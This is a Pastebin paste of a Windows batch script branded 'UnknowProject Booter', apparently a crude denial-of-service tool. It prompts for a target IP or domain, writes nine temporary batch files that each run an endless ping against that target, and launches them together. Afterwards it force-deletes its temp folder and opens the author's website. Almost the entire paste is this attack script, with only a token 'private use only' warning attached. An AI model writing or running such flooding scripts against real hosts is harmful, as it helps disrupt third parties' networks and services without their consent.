Advertisement
Guest User

Untitled

a guest
Oct 21st, 2018
63
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.58 KB | None | 0 0
  1. @echo off
  2. title UnknowProject I Booter I UnknowProject Version: * I Developed by Vxrious
  3. mode 150,40
  4.  
  5. # Start Window
  6. cls
  7.  
  8. SET msgboxTitle=UnknowProject Booter Loaded
  9. SET msgboxBody=UnknowProject developed by TeamVxyn www.vxyn.de
  10. SET tmpmsgbox=%temp%\~tmpmsgbox.vbs
  11. IF EXIST "%tmpmsgbox%" DEL /F /Q "%tmpmsgbox%"
  12. ECHO msgbox "%msgboxBody%",0,"%msgboxTitle%">"%tmpmsgbox%"
  13. WSCRIPT "%tmpmsgbox%"
  14. cls
  15.  
  16. #BootMain
  17. :bootmain
  18. cls
  19. echo.
  20. echo.
  21. echo.
  22. echo.
  23. echo.
  24. timeout /t 1 /nobreak >NUL
  25. echo. $$\ $$\ $$\ $$$$$$$\ $$\
  26. timeout /t 1 /nobreak >NUL
  27. echo. $$ I $$ I $$ I $$ __$$\ $$ I
  28. timeout /t 1 /nobreak >NUL
  29. echo. $$ I $$ I$$$$$$$\ $$ I $$\ $$$$$$$\ $$$$$$\ $$\ $$\ $$\ $$$$$$$\ $$ I $$ I $$$$$$\ $$$$$$\ $$\ $$$$$$\ $$$$$$$\ $$$$$$\
  30. timeout /t 1 /nobreak >NUL
  31. echo. $$ I $$ I$$ __$$\ $$ I $$ I$$ __$$\ $$ __$$\ $$ I $$ I $$ I$$ __$$\ $$$$$$$ I$$ __$$\ $$ __$$\ \__I$$ __$$\ $$ _____I\_$$ _I
  32. timeout /t 1 /nobreak >NUL
  33. echo. $$ I $$ I$$ I $$ I$$$$$$ / $$ I $$ I$$ / $$ I$$ I $$ I $$ I$$ I $$ I$$ ____/ $$ I \__I$$ / $$ I$$\ $$$$$$$$ I$$ / $$ I
  34. timeout /t 1 /nobreak >NUL
  35. echo. $$ I $$ I$$ I $$ I$$ _$$ $$ I $$ I$$ I $$ I$$ I $$ I $$ I$$ I $$ I$$ I $$ I $$ I $$ I$$ I$$ ____I$$ I $$ I$$\
  36. timeout /t 1 /nobreak >NUL
  37. echo. \.$$$$$ I$$ I $$ I$$ I \$$\ $$ I $$ I\$$$$$$ I\$$$$$\$$$$ I$$ I $$ I$$ I $$ I \$$$$$$ I$$ I\$$$$$$$\ \$$$$$$$\ \$$$$ I
  38. timeout /t 1 /nobreak >NUL
  39. echo. \______/ \__I \__I\__I \__I\__I \__I \______/ \_____\____/ \__I \__I\__I \__I \______/ $$ I \_______I \_______I \____/
  40. timeout /t 1 /nobreak >NUL
  41. echo. $$\ $$ I
  42. timeout /t 1 /nobreak >NUL
  43. echo. \$$$$$$ I
  44. timeout /t 1 /nobreak >NUL
  45. echo. \______/
  46. timeout /t 1 /nobreak >NUL
  47. echo.
  48. echo UnknownBooter a UnknowProject Production.
  49. timeout /t 5 /nobreak >NUL
  50.  
  51. #BooterFirst
  52. :booterfirst
  53. cls
  54. title UnknowProject I Booter I UnknowProject Version: * I Activity: Awaiting Infos
  55. echo Set the IP / Domain Here:
  56. set /p ip=
  57. cls
  58. title UnknowProject I Booter I UnknowProject Version: * I Activity: Grabbing DNS Infos (%ip%)
  59. echo Getting Infos from...
  60. ping %ip%
  61. cls
  62. echo Ready to start attack to %ip%
  63. echo WARNING! This is for private use only and not for any damage on 3rd!
  64. echo.
  65. echo Press a button to start
  66. pause >NUL
  67. cls
  68.  
  69. #TempBoots
  70. :tempboots
  71. cls
  72. title UnknowProject I Booter I UnknowProject Version: * I Activity: Creating temp. Booter and starting... (%ip%)
  73. echo Creating temp. Booter...
  74. timemout /t 3 /nobreak >NUL
  75. set name1=tempboot%random%.bat
  76. set name2=tempboot%random%.bat
  77. set name3=tempboot%random%.bat
  78. set name4=tempboot%random%.bat
  79. set name5=tempboot%random%.bat
  80. set name6=tempboot%random%.bat
  81. set name7=tempboot%random%.bat
  82. set name8=tempboot%random%.bat
  83. set name9=tempboot%random%.bat
  84. set ping1=ping -t %ip%
  85.  
  86. #TempBootSource
  87. cls
  88. echo @echo off >> "%userprofile%\Desktop\Destkop Recycling\UnknowProject Release 2\temp\%name1%"
  89. echo color a >> "%userprofile%\Desktop\Destkop Recycling\UnknowProject Release 2\temp\%name1%"
  90. echo title Temp Boot (a UnknowProject Production) >> "%userprofile%\Desktop\Destkop Recycling\UnknowProject Release 2\temp\%name1%"
  91. echo %ping1% >> "%userprofile%\Desktop\Destkop Recycling\UnknowProject Release 2\temp\%name1%"
  92.  
  93. echo @echo off >> "%userprofile%\Desktop\Destkop Recycling\UnknowProject Release 2\temp\%name2%"
  94. echo color a >> "%userprofile%\Desktop\Destkop Recycling\UnknowProject Release 2\temp\%name2%"
  95. echo title Temp Boot (a UnknowProject Production) >> "%userprofile%\Desktop\Destkop Recycling\UnknowProject Release 2\temp\%name2%"
  96. echo %ping1% >> "%userprofile%\Desktop\Destkop Recycling\UnknowProject Release 2\temp\%name2%"
  97.  
  98. echo @echo off >> "%userprofile%\Desktop\Destkop Recycling\UnknowProject Release 2\temp\%name3%"
  99. echo color a >> "%userprofile%\Desktop\Destkop Recycling\UnknowProject Release 2\temp\%name3%"
  100. echo title Temp Boot (a UnknowProject Production) >> "%userprofile%\Desktop\Destkop Recycling\UnknowProject Release 2\temp\%name3%"
  101. echo ping -t %ip% >> "%userprofile%\Desktop\Destkop Recycling\UnknowProject Release 2\temp\%name3%"
  102.  
  103. echo @echo off >> "%userprofile%\Desktop\Destkop Recycling\UnknowProject Release 2\temp\%name4%"
  104. echo color a >> "%userprofile%\Desktop\Destkop Recycling\UnknowProject Release 2\temp\%name4%"
  105. echo title Temp Boot (a UnknowProject Production) >> "%userprofile%\Desktop\Destkop Recycling\UnknowProject Release 2\temp\%name4%"
  106. echo ping -t %ip% >> "%userprofile%\Desktop\Destkop Recycling\UnknowProject Release 2\temp\%name4%"
  107.  
  108. echo @echo off >> "%userprofile%\Desktop\Destkop Recycling\UnknowProject Release 2\temp\%name5%"
  109. echo color a >> "%userprofile%\Desktop\Destkop Recycling\UnknowProject Release 2\temp\%name5%"
  110. echo title Temp Boot (a UnknowProject Production) >> "%userprofile%\Desktop\Destkop Recycling\UnknowProject Release 2\temp\%name5%"
  111. echo ping -t %ip% >> "%userprofile%\Desktop\Destkop Recycling\UnknowProject Release 2\temp\%name5%"
  112.  
  113. echo @echo off >> "%userprofile%\Desktop\Destkop Recycling\UnknowProject Release 2\temp\%name6%"
  114. echo color a >> "%userprofile%\Desktop\Destkop Recycling\UnknowProject Release 2\temp\%name6%"
  115. echo title Temp Boot (a UnknowProject Production) >> "%userprofile%\Desktop\Destkop Recycling\UnknowProject Release 2\temp\%name6%"
  116. echo ping -t %ip% >> "%userprofile%\Desktop\Destkop Recycling\UnknowProject Release 2\temp\%name6%"
  117.  
  118. echo @echo off >> "%userprofile%\Desktop\Destkop Recycling\UnknowProject Release 2\temp\%name7%"
  119. echo color a >> "%userprofile%\Desktop\Destkop Recycling\UnknowProject Release 2\temp\%name7%"
  120. echo title Temp Boot (a UnknowProject Production) >> "%userprofile%\Desktop\Destkop Recycling\UnknowProject Release 2\temp\%name7%"
  121. echo ping -t %ip% >> "%userprofile%\Desktop\Destkop Recycling\UnknowProject Release 2\temp\%name7%"
  122.  
  123. echo @echo off >> "%userprofile%\Desktop\Destkop Recycling\UnknowProject Release 2\temp\%name8%"
  124. echo color a >> "%userprofile%\Desktop\Destkop Recycling\UnknowProject Release 2\temp\%name8%"
  125. echo title Temp Boot (a UnknowProject Production) >> "%userprofile%\Desktop\Destkop Recycling\UnknowProject Release 2\temp\%name8%"
  126. echo ping -t %ip% >> "%userprofile%\Desktop\Destkop Recycling\UnknowProject Release 2\temp\%name8%"
  127.  
  128. echo @echo off >> "%userprofile%\Desktop\Destkop Recycling\UnknowProject Release 2\temp\%name9%"
  129. echo color a >> "%userprofile%\Desktop\Destkop Recycling\UnknowProject Release 2\temp\%name9%"
  130. echo title Temp Boot (a UnknowProject Production) >> "%userprofile%\Desktop\Destkop Recycling\UnknowProject Release 2\temp\%name9%"
  131. echo ping -t %ip% >> "%userprofile%\Desktop\Destkop Recycling\UnknowProject Release 2\temp\%name9%"
  132.  
  133. cls
  134.  
  135. #StartTemps
  136. :starttemps
  137. cls
  138.  
  139. echo Starting Booter...
  140. title UnknowProject I Booter I UnknowProject Version: * I Activity: Last Preparing... (%ip%)
  141. timeout /t 3 /nobreak >NUL
  142. cls
  143. cd "%userprofile%\Desktop\Destkop Recycling\UnknowProject Release 2\temp\"
  144. start %name1%
  145. start %name2%
  146. start %name3%
  147. start %name4%
  148. start %name5%
  149. start %name6%
  150. start %name7%
  151. start %name8%
  152. start %name9%
  153. cls
  154. echo Keep this Window OPEN!
  155. echo.
  156. echo BOOTER IS RUNNING.
  157. echo.
  158. echo KEEP THIS WINDOWS OPEN!
  159. echo.
  160. echo IF THIS WINDOWS GETS CLOSED THERE COUGHT BE DAMAGE TO YOU'RE PC!
  161. echo.
  162. echo TO END THE BOOTER CLOSE ALL TEMP WINDOWS AND PRESS A BUTTON TO CLEAR THE TEMPS! IMPORTANT!
  163. title UnknowProject I Booter I UnknowProject Version: * I Activity: Booting... (%ip%)
  164. pause >NUL
  165. cls
  166. echo Clearing...
  167. title UnknowProject I Booter I UnknowProject Version: * I Activity: Clearing
  168. timemout /t 5 /nobreak >NUL
  169. cls
  170.  
  171. cd "%userprofile%\Desktop\Destkop Recycling\UnknowProject Release 2\temp\"
  172. del /f/s/q *
  173.  
  174. cls
  175. echo Booter is cleared and finished!
  176. echo A UnknowProject Production
  177. echo.
  178. echo Press a Button to End.
  179. pause >NUL
  180.  
  181. cls
  182. start "" http://www.vxyn.de
  183. ren "%userprofile%\Desktop\Destkop Recycling\UnknowProject Release 2\products\booter.bat" booter
  184.  
  185. exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement